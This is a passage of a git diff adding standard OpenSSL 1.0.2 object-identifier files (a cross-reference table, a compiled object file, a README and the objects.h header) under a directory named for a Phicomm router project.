+	{NID_dhSinglePass_cofactorDH_sha512kdf_scheme, NID_sha512, NID_dh_cofactor_kdf},
+	};
+
+static const nid_triple * const sigoid_srt_xref[] =
+	{
+	&sigoid_srt[0],
+	&sigoid_srt[1],
+	&sigoid_srt[7],
+	&sigoid_srt[2],
+	&sigoid_srt[4],
+	&sigoid_srt[3],
+	&sigoid_srt[9],
+	&sigoid_srt[5],
+	&sigoid_srt[8],
+	&sigoid_srt[12],
+	&sigoid_srt[30],
+	&sigoid_srt[35],
+	&sigoid_srt[6],
+	&sigoid_srt[10],
+	&sigoid_srt[11],
+	&sigoid_srt[13],
+	&sigoid_srt[24],
+	&sigoid_srt[20],
+	&sigoid_srt[32],
+	&sigoid_srt[37],
+	&sigoid_srt[14],
+	&sigoid_srt[21],
+	&sigoid_srt[33],
+	&sigoid_srt[38],
+	&sigoid_srt[15],
+	&sigoid_srt[22],
+	&sigoid_srt[34],
+	&sigoid_srt[39],
+	&sigoid_srt[16],
+	&sigoid_srt[23],
+	&sigoid_srt[19],
+	&sigoid_srt[31],
+	&sigoid_srt[36],
+	&sigoid_srt[25],
+	&sigoid_srt[26],
+	&sigoid_srt[27],
+	&sigoid_srt[28],
+	};
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.o
new file mode 100644
index 0000000000000000000000000000000000000000..b807149c4825689ee61a971445c3e78f502f73dc
GIT binary patch
literal 6536
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.txt
new file mode 100644
index 0000000..19c9422
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.txt
@@ -0,0 +1,58 @@
+# OID cross reference table.
+# Links signatures OIDs to their corresponding public key algorithms
+# and digests.
+
+md2WithRSAEncryption	md2	rsaEncryption
+md5WithRSAEncryption	md5	rsaEncryption
+shaWithRSAEncryption	sha	rsaEncryption
+sha1WithRSAEncryption	sha1	rsaEncryption
+md4WithRSAEncryption	md4	rsaEncryption
+sha256WithRSAEncryption sha256	rsaEncryption
+sha384WithRSAEncryption	sha384	rsaEncryption
+sha512WithRSAEncryption	sha512	rsaEncryption
+sha224WithRSAEncryption	sha224	rsaEncryption
+mdc2WithRSA		mdc2	rsaEncryption
+ripemd160WithRSA	ripemd160 rsaEncryption
+# For PSS the digest algorithm can vary and depends on the included
+# AlgorithmIdentifier. The digest "undef" indicates the public key
+# method should handle this explicitly.
+rsassaPss		undef	rsaEncryption
+
+# Alternative deprecated OIDs. By using the older "rsa" OID this
+# type will be recognized by not normally used.
+
+md5WithRSA		md5	rsa
+sha1WithRSA		sha1	rsa
+
+dsaWithSHA		sha	dsa
+dsaWithSHA1		sha1	dsa
+
+dsaWithSHA1_2		sha1	dsa_2
+
+ecdsa_with_SHA1		sha1	X9_62_id_ecPublicKey
+ecdsa_with_SHA224	sha224	X9_62_id_ecPublicKey
+ecdsa_with_SHA256	sha256	X9_62_id_ecPublicKey
+ecdsa_with_SHA384	sha384	X9_62_id_ecPublicKey
+ecdsa_with_SHA512	sha512	X9_62_id_ecPublicKey
+ecdsa_with_Recommended	undef	X9_62_id_ecPublicKey
+ecdsa_with_Specified	undef	X9_62_id_ecPublicKey
+
+dsa_with_SHA224		sha224	dsa
+dsa_with_SHA256		sha256	dsa
+
+id_GostR3411_94_with_GostR3410_2001	id_GostR3411_94 id_GostR3410_2001
+id_GostR3411_94_with_GostR3410_94	id_GostR3411_94 id_GostR3410_94
+id_GostR3411_94_with_GostR3410_94_cc	id_GostR3411_94 id_GostR3410_94_cc
+id_GostR3411_94_with_GostR3410_2001_cc	id_GostR3411_94 id_GostR3410_2001_cc
+# ECDH KDFs and their corresponding message digests and schemes
+dhSinglePass_stdDH_sha1kdf_scheme		sha1	dh_std_kdf
+dhSinglePass_stdDH_sha224kdf_scheme		sha224	dh_std_kdf
+dhSinglePass_stdDH_sha256kdf_scheme		sha256	dh_std_kdf
+dhSinglePass_stdDH_sha384kdf_scheme		sha384	dh_std_kdf
+dhSinglePass_stdDH_sha512kdf_scheme		sha512	dh_std_kdf
+
+dhSinglePass_cofactorDH_sha1kdf_scheme		sha1	dh_cofactor_kdf
+dhSinglePass_cofactorDH_sha224kdf_scheme	sha224	dh_cofactor_kdf
+dhSinglePass_cofactorDH_sha256kdf_scheme	sha256	dh_cofactor_kdf
+dhSinglePass_cofactorDH_sha384kdf_scheme	sha384	dh_cofactor_kdf
+dhSinglePass_cofactorDH_sha512kdf_scheme	sha512	dh_cofactor_kdf
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.README
new file mode 100644
index 0000000..4d74550
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.README
@@ -0,0 +1,44 @@
+objects.txt syntax
+------------------
+
+To cover all the naming hacks that were previously in objects.h needed some
+kind of hacks in objects.txt.
+
+The basic syntax for adding an object is as follows:
+
+	1 2 3 4		: shortName	: Long Name
+
+		If the long name doesn't contain spaces, or no short name
+		exists, the long name is used as basis for the base name
+		in C.  Otherwise, the short name is used.
+
+		The base name (let's call it 'base') will then be used to
+		create the C macros SN_base, LN_base, NID_base and OBJ_base.
+
+		Note that if the base name contains spaces, dashes or periods,
+		those will be converte to underscore.
+
+Then there are some extra commands:
+
+	!Alias foo 1 2 3 4
+
+		This juts makes a name foo for an OID.  The C macro
+		OBJ_foo will be created as a result.
+
+	!Cname foo
+
+		This makes sure that the name foo will be used as base name
+		in C.
+
+	!module foo
+	1 2 3 4		: shortName	: Long Name
+	!global
+
+		The !module command was meant to define a kind of modularity.
+		What it does is to make sure the module name is prepended
+		to the base name.  !global turns this off.  This construction
+		is not recursive.
+
+Lines starting with # are treated as comments, as well as any line starting
+with ! and not matching the commands above.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.h
new file mode 100644
index 0000000..b8dafa8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.h
@@ -0,0 +1,1143 @@
+/* crypto/objects/objects.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_OBJECTS_H
+# define HEADER_OBJECTS_H
+
+# define USE_OBJ_MAC
+
+# ifdef USE_OBJ_MAC
+#  include <openssl/obj_mac.h>
+# else
+#  define SN_undef                        "UNDEF"
+#  define LN_undef                        "undefined"
+#  define NID_undef                       0
+#  define OBJ_undef                       0L
+
+#  define SN_Algorithm                    "Algorithm"
+#  define LN_algorithm                    "algorithm"
+#  define NID_algorithm                   38
+#  define OBJ_algorithm                   1L,3L,14L,3L,2L
+
+#  define LN_rsadsi                       "rsadsi"
+#  define NID_rsadsi                      1
+#  define OBJ_rsadsi                      1L,2L,840L,113549L
+
+#  define LN_pkcs                         "pkcs"
+#  define NID_pkcs                        2
+#  define OBJ_pkcs                        OBJ_rsadsi,1L
+
+#  define SN_md2                          "MD2"
+#  define LN_md2                          "md2"
+#  define NID_md2                         3
+#  define OBJ_md2                         OBJ_rsadsi,2L,2L
+
+#  define SN_md5                          "MD5"
+#  define LN_md5                          "md5"
+#  define NID_md5                         4
+#  define OBJ_md5                         OBJ_rsadsi,2L,5L
+
+#  define SN_rc4                          "RC4"
+#  define LN_rc4                          "rc4"
+#  define NID_rc4                         5
+#  define OBJ_rc4                         OBJ_rsadsi,3L,4L
+
+#  define LN_rsaEncryption                "rsaEncryption"
+#  define NID_rsaEncryption               6
+#  define OBJ_rsaEncryption               OBJ_pkcs,1L,1L
+
+#  define SN_md2WithRSAEncryption         "RSA-MD2"
+#  define LN_md2WithRSAEncryption         "md2WithRSAEncryption"
+#  define NID_md2WithRSAEncryption        7
+#  define OBJ_md2WithRSAEncryption        OBJ_pkcs,1L,2L
+
+#  define SN_md5WithRSAEncryption         "RSA-MD5"
+#  define LN_md5WithRSAEncryption         "md5WithRSAEncryption"
+#  define NID_md5WithRSAEncryption        8
+#  define OBJ_md5WithRSAEncryption        OBJ_pkcs,1L,4L
+
+#  define SN_pbeWithMD2AndDES_CBC         "PBE-MD2-DES"
+#  define LN_pbeWithMD2AndDES_CBC         "pbeWithMD2AndDES-CBC"
+#  define NID_pbeWithMD2AndDES_CBC        9
+#  define OBJ_pbeWithMD2AndDES_CBC        OBJ_pkcs,5L,1L
+
+#  define SN_pbeWithMD5AndDES_CBC         "PBE-MD5-DES"
+#  define LN_pbeWithMD5AndDES_CBC         "pbeWithMD5AndDES-CBC"
+#  define NID_pbeWithMD5AndDES_CBC        10
+#  define OBJ_pbeWithMD5AndDES_CBC        OBJ_pkcs,5L,3L
+
+#  define LN_X500                         "X500"
+#  define NID_X500                        11
+#  define OBJ_X500                        2L,5L
+
+#  define LN_X509                         "X509"
+#  define NID_X509                        12
+#  define OBJ_X509                        OBJ_X500,4L
+
+#  define SN_commonName                   "CN"
+#  define LN_commonName                   "commonName"
+#  define NID_commonName                  13
+#  define OBJ_commonName                  OBJ_X509,3L
+
+#  define SN_countryName                  "C"
+#  define LN_countryName                  "countryName"
+#  define NID_countryName                 14
+#  define OBJ_countryName                 OBJ_X509,6L
+
+#  define SN_localityName                 "L"
+#  define LN_localityName                 "localityName"
+#  define NID_localityName                15
+#  define OBJ_localityName                OBJ_X509,7L
+
+/* Postal Address? PA */
+
+/* should be "ST" (rfc1327) but MS uses 'S' */
+#  define SN_stateOrProvinceName          "ST"
+#  define LN_stateOrProvinceName          "stateOrProvinceName"
+#  define NID_stateOrProvinceName         16
+#  define OBJ_stateOrProvinceName         OBJ_X509,8L
+
+#  define SN_organizationName             "O"
+#  define LN_organizationName             "organizationName"
+#  define NID_organizationName            17
+#  define OBJ_organizationName            OBJ_X509,10L
+
+#  define SN_organizationalUnitName       "OU"
+#  define LN_organizationalUnitName       "organizationalUnitName"
+#  define NID_organizationalUnitName      18
+#  define OBJ_organizationalUnitName      OBJ_X509,11L
+
+#  define SN_rsa                          "RSA"
+#  define LN_rsa                          "rsa"
+#  define NID_rsa                         19
+#  define OBJ_rsa                         OBJ_X500,8L,1L,1L
+
+#  define LN_pkcs7                        "pkcs7"
+#  define NID_pkcs7                       20
+#  define OBJ_pkcs7                       OBJ_pkcs,7L
+
+#  define LN_pkcs7_data                   "pkcs7-data"
+#  define NID_pkcs7_data                  21
+#  define OBJ_pkcs7_data                  OBJ_pkcs7,1L
+
+#  define LN_pkcs7_signed                 "pkcs7-signedData"
+#  define NID_pkcs7_signed                22
+#  define OBJ_pkcs7_signed                OBJ_pkcs7,2L
+
+#  define LN_pkcs7_enveloped              "pkcs7-envelopedData"
+#  define NID_pkcs7_enveloped             23
+#  define OBJ_pkcs7_enveloped             OBJ_pkcs7,3L
+
+#  define LN_pkcs7_signedAndEnveloped     "pkcs7-signedAndEnvelopedData"
+#  define NID_pkcs7_signedAndEnveloped    24
+#  define OBJ_pkcs7_signedAndEnveloped    OBJ_pkcs7,4L
+
+#  define LN_pkcs7_digest                 "pkcs7-digestData"
+#  define NID_pkcs7_digest                25
+#  define OBJ_pkcs7_digest                OBJ_pkcs7,5L
+
+#  define LN_pkcs7_encrypted              "pkcs7-encryptedData"
+#  define NID_pkcs7_encrypted             26
+#  define OBJ_pkcs7_encrypted             OBJ_pkcs7,6L
+
+#  define LN_pkcs3                        "pkcs3"
+#  define NID_pkcs3                       27
+#  define OBJ_pkcs3                       OBJ_pkcs,3L
+
+#  define LN_dhKeyAgreement               "dhKeyAgreement"
+#  define NID_dhKeyAgreement              28
+#  define OBJ_dhKeyAgreement              OBJ_pkcs3,1L
+
+#  define SN_des_ecb                      "DES-ECB"
+#  define LN_des_ecb                      "des-ecb"
+#  define NID_des_ecb                     29
+#  define OBJ_des_ecb                     OBJ_algorithm,6L
+
+#  define SN_des_cfb64                    "DES-CFB"
+#  define LN_des_cfb64                    "des-cfb"
+#  define NID_des_cfb64                   30
+/* IV + num */
+#  define OBJ_des_cfb64                   OBJ_algorithm,9L
+
+#  define SN_des_cbc                      "DES-CBC"
+#  define LN_des_cbc                      "des-cbc"
+#  define NID_des_cbc                     31
+/* IV */
+#  define OBJ_des_cbc                     OBJ_algorithm,7L
+
+#  define SN_des_ede                      "DES-EDE"
+#  define LN_des_ede                      "des-ede"
+#  define NID_des_ede                     32
+/* ?? */
+#  define OBJ_des_ede                     OBJ_algorithm,17L
+
+#  define SN_des_ede3                     "DES-EDE3"
+#  define LN_des_ede3                     "des-ede3"
+#  define NID_des_ede3                    33
+
+#  define SN_idea_cbc                     "IDEA-CBC"
+#  define LN_idea_cbc                     "idea-cbc"
+#  define NID_idea_cbc                    34
+#  define OBJ_idea_cbc                    1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
+
+#  define SN_idea_cfb64                   "IDEA-CFB"
+#  define LN_idea_cfb64                   "idea-cfb"
+#  define NID_idea_cfb64                  35
+
+#  define SN_idea_ecb                     "IDEA-ECB"
+#  define LN_idea_ecb                     "idea-ecb"
+#  define NID_idea_ecb                    36
+
+#  define SN_rc2_cbc                      "RC2-CBC"
+#  define LN_rc2_cbc                      "rc2-cbc"
+#  define NID_rc2_cbc                     37
+#  define OBJ_rc2_cbc                     OBJ_rsadsi,3L,2L
+
+#  define SN_rc2_ecb                      "RC2-ECB"
+#  define LN_rc2_ecb                      "rc2-ecb"
+#  define NID_rc2_ecb                     38
+
+#  define SN_rc2_cfb64                    "RC2-CFB"
+#  define LN_rc2_cfb64                    "rc2-cfb"
+#  define NID_rc2_cfb64                   39
+
+#  define SN_rc2_ofb64                    "RC2-OFB"
+#  define LN_rc2_ofb64                    "rc2-ofb"
+#  define NID_rc2_ofb64                   40
+
+#  define SN_sha                          "SHA"
+#  define LN_sha                          "sha"
+#  define NID_sha                         41
+#  define OBJ_sha                         OBJ_algorithm,18L
+
+#  define SN_shaWithRSAEncryption         "RSA-SHA"
+#  define LN_shaWithRSAEncryption         "shaWithRSAEncryption"
+#  define NID_shaWithRSAEncryption        42
+#  define OBJ_shaWithRSAEncryption        OBJ_algorithm,15L
+
+#  define SN_des_ede_cbc                  "DES-EDE-CBC"
+#  define LN_des_ede_cbc                  "des-ede-cbc"
+#  define NID_des_ede_cbc                 43
+
+#  define SN_des_ede3_cbc                 "DES-EDE3-CBC"
+#  define LN_des_ede3_cbc                 "des-ede3-cbc"
+#  define NID_des_ede3_cbc                44
+#  define OBJ_des_ede3_cbc                OBJ_rsadsi,3L,7L
+
+#  define SN_des_ofb64                    "DES-OFB"
+#  define LN_des_ofb64                    "des-ofb"
+#  define NID_des_ofb64                   45
+#  define OBJ_des_ofb64                   OBJ_algorithm,8L
+
+#  define SN_idea_ofb64                   "IDEA-OFB"
+#  define LN_idea_ofb64                   "idea-ofb"
+#  define NID_idea_ofb64                  46
+
+#  define LN_pkcs9                        "pkcs9"
+#  define NID_pkcs9                       47
+#  define OBJ_pkcs9                       OBJ_pkcs,9L
+
+#  define SN_pkcs9_emailAddress           "Email"
+#  define LN_pkcs9_emailAddress           "emailAddress"
+#  define NID_pkcs9_emailAddress          48
+#  define OBJ_pkcs9_emailAddress          OBJ_pkcs9,1L
+
+#  define LN_pkcs9_unstructuredName       "unstructuredName"
+#  define NID_pkcs9_unstructuredName      49
+#  define OBJ_pkcs9_unstructuredName      OBJ_pkcs9,2L
+
+#  define LN_pkcs9_contentType            "contentType"
+#  define NID_pkcs9_contentType           50
+#  define OBJ_pkcs9_contentType           OBJ_pkcs9,3L
+
+#  define LN_pkcs9_messageDigest          "messageDigest"
+#  define NID_pkcs9_messageDigest         51
+#  define OBJ_pkcs9_messageDigest         OBJ_pkcs9,4L
+
+#  define LN_pkcs9_signingTime            "signingTime"
+#  define NID_pkcs9_signingTime           52
+#  define OBJ_pkcs9_signingTime           OBJ_pkcs9,5L
+
+#  define LN_pkcs9_countersignature       "countersignature"
+#  define NID_pkcs9_countersignature      53
+#  define OBJ_pkcs9_countersignature      OBJ_pkcs9,6L
+
+#  define LN_pkcs9_challengePassword      "challengePassword"
+#  define NID_pkcs9_challengePassword     54
+#  define OBJ_pkcs9_challengePassword     OBJ_pkcs9,7L
+
+#  define LN_pkcs9_unstructuredAddress    "unstructuredAddress"
+#  define NID_pkcs9_unstructuredAddress   55
+#  define OBJ_pkcs9_unstructuredAddress   OBJ_pkcs9,8L
+
+#  define LN_pkcs9_extCertAttributes      "extendedCertificateAttributes"
+#  define NID_pkcs9_extCertAttributes     56
+#  define OBJ_pkcs9_extCertAttributes     OBJ_pkcs9,9L
+
+#  define SN_netscape                     "Netscape"
+#  define LN_netscape                     "Netscape Communications Corp."
+#  define NID_netscape                    57
+#  define OBJ_netscape                    2L,16L,840L,1L,113730L
+
+#  define SN_netscape_cert_extension      "nsCertExt"
+#  define LN_netscape_cert_extension      "Netscape Certificate Extension"
+#  define NID_netscape_cert_extension     58
+#  define OBJ_netscape_cert_extension     OBJ_netscape,1L
+
+#  define SN_netscape_data_type           "nsDataType"
+#  define LN_netscape_data_type           "Netscape Data Type"
+#  define NID_netscape_data_type          59
+#  define OBJ_netscape_data_type          OBJ_netscape,2L
+
+#  define SN_des_ede_cfb64                "DES-EDE-CFB"
+#  define LN_des_ede_cfb64                "des-ede-cfb"
+#  define NID_des_ede_cfb64               60
+
+#  define SN_des_ede3_cfb64               "DES-EDE3-CFB"
+#  define LN_des_ede3_cfb64               "des-ede3-cfb"
+#  define NID_des_ede3_cfb64              61
+
+#  define SN_des_ede_ofb64                "DES-EDE-OFB"
+#  define LN_des_ede_ofb64                "des-ede-ofb"
+#  define NID_des_ede_ofb64               62
+
+#  define SN_des_ede3_ofb64               "DES-EDE3-OFB"
+#  define LN_des_ede3_ofb64               "des-ede3-ofb"
+#  define NID_des_ede3_ofb64              63
+
+/* I'm not sure about the object ID */
+#  define SN_sha1                         "SHA1"
+#  define LN_sha1                         "sha1"
+#  define NID_sha1                        64
+#  define OBJ_sha1                        OBJ_algorithm,26L
+/* 28 Jun 1996 - eay */
+/* #define OBJ_sha1                     1L,3L,14L,2L,26L,05L <- wrong */
+
+#  define SN_sha1WithRSAEncryption        "RSA-SHA1"
+#  define LN_sha1WithRSAEncryption        "sha1WithRSAEncryption"
+#  define NID_sha1WithRSAEncryption       65
+#  define OBJ_sha1WithRSAEncryption       OBJ_pkcs,1L,5L
+
+#  define SN_dsaWithSHA                   "DSA-SHA"
+#  define LN_dsaWithSHA                   "dsaWithSHA"
+#  define NID_dsaWithSHA                  66
+#  define OBJ_dsaWithSHA                  OBJ_algorithm,13L
+
+#  define SN_dsa_2                        "DSA-old"
+#  define LN_dsa_2                        "dsaEncryption-old"
+#  define NID_dsa_2                       67
+#  define OBJ_dsa_2                       OBJ_algorithm,12L
+
+/* proposed by microsoft to RSA */
+#  define SN_pbeWithSHA1AndRC2_CBC        "PBE-SHA1-RC2-64"
+#  define LN_pbeWithSHA1AndRC2_CBC        "pbeWithSHA1AndRC2-CBC"
+#  define NID_pbeWithSHA1AndRC2_CBC       68
+#  define OBJ_pbeWithSHA1AndRC2_CBC       OBJ_pkcs,5L,11L
+
+/*
+ * proposed by microsoft to RSA as pbeWithSHA1AndRC4: it is now defined
+ * explicitly in PKCS#5 v2.0 as id-PBKDF2 which is something completely
+ * different.
+ */
+#  define LN_id_pbkdf2                    "PBKDF2"
+#  define NID_id_pbkdf2                   69
+#  define OBJ_id_pbkdf2                   OBJ_pkcs,5L,12L
+
+#  define SN_dsaWithSHA1_2                "DSA-SHA1-old"
+#  define LN_dsaWithSHA1_2                "dsaWithSHA1-old"
+#  define NID_dsaWithSHA1_2               70
+/* Got this one from 'sdn706r20.pdf' which is actually an NSA document :-) */
+#  define OBJ_dsaWithSHA1_2               OBJ_algorithm,27L
+
+#  define SN_netscape_cert_type           "nsCertType"
+#  define LN_netscape_cert_type           "Netscape Cert Type"
+#  define NID_netscape_cert_type          71
+#  define OBJ_netscape_cert_type          OBJ_netscape_cert_extension,1L
+
+#  define SN_netscape_base_url            "nsBaseUrl"
+#  define LN_netscape_base_url            "Netscape Base Url"
+#  define NID_netscape_base_url           72
+#  define OBJ_netscape_base_url           OBJ_netscape_cert_extension,2L
+
+#  define SN_netscape_revocation_url      "nsRevocationUrl"
+#  define LN_netscape_revocation_url      "Netscape Revocation Url"
+#  define NID_netscape_revocation_url     73
+#  define OBJ_netscape_revocation_url     OBJ_netscape_cert_extension,3L
+
+#  define SN_netscape_ca_revocation_url   "nsCaRevocationUrl"
+#  define LN_netscape_ca_revocation_url   "Netscape CA Revocation Url"
+#  define NID_netscape_ca_revocation_url  74
+#  define OBJ_netscape_ca_revocation_url  OBJ_netscape_cert_extension,4L
+
+#  define SN_netscape_renewal_url         "nsRenewalUrl"
